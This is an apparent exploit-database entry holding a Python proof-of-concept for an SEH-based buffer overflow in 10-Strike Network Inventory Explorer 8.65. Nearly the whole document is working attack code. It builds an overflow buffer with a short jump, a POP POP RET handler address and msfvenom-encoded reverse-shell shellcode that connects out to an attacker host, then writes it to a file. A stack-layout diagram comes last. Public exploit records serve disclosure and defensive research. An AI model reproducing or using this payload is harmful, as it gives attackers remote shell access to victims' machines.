10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)

2020-12-01
ID: 103631
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 2020-09-02
# Exploit Author: Sectechs
# Vendor Homepage: https://www.10-strike.com
# Version: 8.65
# Tested on: Windows 7 x86 SP1 

import os
import sys
import struct
import socket


crash ="A"* 209 

# jmp short 8
# [email protected]:msf-nasm_shell
# nasm> jmp short 8
Next_SE_Pointer = "\xeb\x06\x90\x90"
# 61e8497a
SE_Handler="\x7a\x49\xe8\x61"
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.6.211 LPORT=5555 -f c -b "\x00" -e x86/alpha_mixed 
payload = (
"\xdb\xc3\xd9\x74\x24\xf4\x5e\x56\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
"\x6c\x59\x78\x6d\x52\x43\x30\x53\x30\x75\x50\x33\x50\x4f\x79"
"\x69\x75\x34\x71\x69\x50\x32\x44\x4e\x6b\x32\x70\x64\x70\x6c"
"\x4b\x76\x32\x54\x4c\x4e\x6b\x31\x42\x66\x74\x6c\x4b\x72\x52"
"\x74\x68\x44\x4f\x48\x37\x42\x6a\x34\x66\x76\x51\x79\x6f\x6c"
"\x6c\x77\x4c\x65\x31\x53\x4c\x74\x42\x64\x6c\x77\x50\x39\x51"
"\x38\x4f\x74\x4d\x66\x61\x38\x47\x59\x72\x48\x72\x52\x72\x63"
"\x67\x6c\x4b\x66\x32\x56\x70\x6c\x4b\x43\x7a\x45\x6c\x6c\x4b"
"\x30\x4c\x76\x71\x43\x48\x4b\x53\x62\x68\x45\x51\x4b\x61\x43"
"\x61\x4c\x4b\x73\x69\x57\x50\x37\x71\x68\x53\x4e\x6b\x52\x69"
"\x36\x78\x6d\x33\x46\x5a\x43\x79\x4e\x6b\x35\x64\x4c\x4b\x77"
"\x71\x5a\x76\x75\x61\x6b\x4f\x4e\x4c\x4b\x71\x58\x4f\x46\x6d"
"\x65\x51\x5a\x67\x66\x58\x79\x70\x63\x45\x6a\x56\x75\x53\x63"
"\x4d\x6c\x38\x45\x6b\x53\x4d\x54\x64\x32\x55\x4b\x54\x52\x78"
"\x6e\x6b\x71\x48\x71\x34\x77\x71\x5a\x73\x55\x36\x6e\x6b\x56"
"\x6c\x50\x4b\x4e\x6b\x50\x58\x55\x4c\x36\x61\x78\x53\x6c\x4b"
"\x54\x44\x4e\x6b\x65\x51\x5a\x70\x6d\x59\x71\x54\x36\x44\x67"
"\x54\x73\x6b\x51\x4b\x51\x71\x50\x59\x50\x5a\x62\x71\x79\x6f"
"\x4b\x50\x73\x6f\x51\x4f\x63\x6a\x4e\x6b\x55\x42\x58\x6b\x4e"
"\x6d\x53\x6d\x45\x38\x65\x63\x74\x72\x35\x50\x55\x50\x53\x58"
"\x62\x57\x31\x63\x37\x42\x61\x4f\x36\x34\x33\x58\x32\x6c\x53"
"\x47\x31\x36\x73\x37\x4b\x4f\x49\x45\x68\x38\x4c\x50\x56\x61"
"\x33\x30\x57\x70\x44\x69\x68\x44\x76\x34\x30\x50\x32\x48\x67"
"\x59\x6d\x50\x50\x6b\x73\x30\x39\x6f\x59\x45\x32\x70\x72\x70"
"\x72\x70\x70\x50\x71\x50\x52\x70\x31\x50\x70\x50\x33\x58\x6a"
"\x4a\x36\x6f\x49\x4f\x6b\x50\x69\x6f\x38\x55\x4a\x37\x33\x5a"
"\x43\x35\x43\x58\x4f\x30\x6f\x58\x66\x66\x4e\x33\x73\x58\x46"
"\x62\x35\x50\x32\x35\x4c\x73\x6d\x59\x38\x66\x62\x4a\x72\x30"
"\x50\x56\x36\x37\x71\x78\x7a\x39\x59\x35\x42\x54\x35\x31\x79"
"\x6f\x4b\x65\x4b\x35\x39\x50\x52\x54\x54\x4c\x69\x6f\x30\x4e"
"\x47\x78\x52\x55\x38\x6c\x61\x78\x4c\x30\x58\x35\x79\x32\x33"
"\x66\x79\x6f\x4a\x75\x72\x48\x35\x33\x52\x4d\x71\x74\x53\x30"
"\x4d\x59\x59\x73\x51\x47\x50\x57\x70\x57\x75\x61\x78\x76\x33"
"\x5a\x76\x72\x73\x69\x51\x46\x48\x62\x6b\x4d\x70\x66\x6b\x77"
"\x47\x34\x57\x54\x37\x4c\x57\x71\x46\x61\x6e\x6d\x32\x64\x46"
"\x44\x44\x50\x79\x56\x65\x50\x37\x34\x73\x64\x56\x30\x52\x76"
"\x33\x66\x62\x76\x67\x36\x32\x76\x42\x6e\x56\x36\x32\x76\x62"
"\x73\x43\x66\x45\x38\x51\x69\x78\x4c\x37\x4f\x6b\x36\x49\x6f"
"\x58\x55\x4c\x49\x39\x70\x62\x6e\x73\x66\x71\x56\x39\x6f\x76"
"\x50\x55\x38\x35\x58\x6c\x47\x47\x6d\x45\x30\x79\x6f\x69\x45"
"\x6d\x6b\x78\x70\x6c\x75\x4c\x62\x73\x66\x35\x38\x69\x36\x7a"
"\x35\x6d\x6d\x4d\x4d\x39\x6f\x5a\x75\x67\x4c\x67\x76\x51\x6c"
"\x45\x5a\x4f\x70\x69\x6b\x39\x70\x54\x35\x36\x65\x6d\x6b\x33"
"\x77\x56\x73\x43\x42\x30\x6f\x72\x4a\x65\x50\x62\x73\x49\x6f"
"\x68\x55\x41\x41")
buffer = crash + Next_SE_Pointer + SE_Handler  + "\x90" * 20 +  payload  + "\x90" * 200
f=open("PoC6.txt","w")
	
f.write(buffer)
f.close()
'''
  ----------------------------------
  | NEXT SEH Pointer               |
--|------ ESP                      |     |     < ------- A * 209
| |---------------------------------     |
| | SE_Handler        ?            |     |
| |   #POP #POP #RET  |            |     |  
| | -------------------------------|     |
|					 ? Stack
|
|
|______ ? -------------------------
         |      PAYLOAD            | -------- ? call | KALI |
         __________________________

'''
1-4-2 (www01)